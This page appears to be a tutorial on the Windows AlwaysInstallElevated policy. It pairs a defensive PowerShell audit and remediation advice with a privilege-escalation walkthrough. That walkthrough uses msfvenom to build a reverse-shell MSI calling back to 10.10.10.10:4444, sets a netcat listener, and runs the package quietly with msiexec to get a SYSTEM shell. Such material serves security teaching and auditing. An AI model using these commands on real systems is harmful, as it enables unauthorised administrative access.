Always Install Elevated
Overview
The Always Install Elevated policy is a setting in Windows that allows standard users to install applications with elevated privileges. When this policy is enabled, any application installation initiated by a standard user can run with administrative rights, effectively bypassing User Account Control (UAC) prompts.
How It Works
When the Always Install Elevated setting is enabled, the following occurs:
Elevation of Installations: Standard users can install applications without being prompted for administrator credentials. This means that any MSI (Microsoft Installer) package executed will run with elevated permissions.
UAC Bypass: Users do not see the standard UAC prompt, so they may be unaware of the risks of installing potentially harmful software.
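To confirm whether a host is actually exposed, read the policy's registry values. The PowerShell audit below is an added example, not part of the original page; it relies on the fact that the policy only takes effect when AlwaysInstallElevated is 1 in both the machine hive and the user's hive, and the function names are hypothetical.

```powershell
# Added audit example (not from the original page).
# The policy is effective only when AlwaysInstallElevated = 1 in BOTH
# HKLM and the user's hive under the Installer policy key.
$SubKey    = 'SOFTWARE\Policies\Microsoft\Windows\Installer'
$ValueName = 'AlwaysInstallElevated'

function Get-AieValue {
    param([Parameter(Mandatory)][string]$Path)
    # Returns the DWORD as an int, or $null when the key or value is absent
    # (or unreadable because the caller lacks rights to that hive).
    $item = Get-ItemProperty -Path $Path -Name $ValueName -ErrorAction SilentlyContinue
    if ($null -ne $item) { return [int]$item.$ValueName }
    return $null
}

function Test-AlwaysInstallElevated {
    $machine = Get-AieValue "Registry::HKEY_LOCAL_MACHINE\$SubKey"

    # Loaded user hives: local/domain SIDs (S-1-5-21-...) and Entra ID SIDs
    # (S-1-12-1-...). The anchored pattern skips the *_Classes hives.
    $sids = Get-ChildItem 'Registry::HKEY_USERS' -ErrorAction SilentlyContinue |
        Where-Object { $_.PSChildName -match '^S-1-(5-21|12-1)-[\d-]+$' } |
        ForEach-Object { $_.PSChildName }

    foreach ($sid in $sids) {
        $user = Get-AieValue "Registry::HKEY_USERS\$sid\$SubKey"
        [pscustomobject]@{
            UserSid      = $sid
            MachineValue = $machine
            UserValue    = $user
            Exposed      = ($machine -eq 1 -and $user -eq 1)
        }
    }
}

$results = @(Test-AlwaysInstallElevated)
$results | Format-Table -AutoSize

if ($results | Where-Object { $_.Exposed }) {
    Write-Warning 'AlwaysInstallElevated is active for at least one loaded profile.'
} elseif ($results | Where-Object { $_.MachineValue -eq 1 -or $_.UserValue -eq 1 }) {
    Write-Warning 'AlwaysInstallElevated is set in one hive only; not effective, but should be cleared.'
}
```

Run it elevated so other users' hives can be read; only profiles currently loaded under HKEY_USERS are covered. To remediate, set "Always install with elevated privileges" to Disabled or Not Configured in both the Computer and User Configuration branches of Group Policy (Administrative Templates > Windows Components > Windows Installer).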
Creating and Executing a Malicious MSI Package for Reverse Shell Access
Generate the Malicious MSI Package:
Use msfvenom to create a malicious MSI file that will initiate a reverse shell connection back to your listener. In this example, the local host (LHOST) is set to 10.10.10.10, and the local port (LPORT) is set to 4444. The command to generate the MSI package is as follows:
dollarboysushil@kali$ msfvenom -p windows/shell_reverse_tcp lhost=10.10.10.10 lport=4444 -f msi > dbs.msi
Transfer the MSI File:
After generating the dbs.msi file, transfer it to the target machine where you want to execute it.
Set Up a Netcat Listener:
On your attacking machine, set up a netcat listener to catch the reverse shell once the MSI package is executed:
nc -lnvp 4444
Execute the MSI Package:
On the target machine, run the following command to execute the malicious MSI package quietly, without displaying any prompts or restarting the system:
C:\> msiexec /i c:\users\dollarboysushil\desktop\dbs.msi /quiet /qn /norestart
After executing this command, the target machine will connect back to your listener, providing you with a reverse shell with SYSTEM privileges.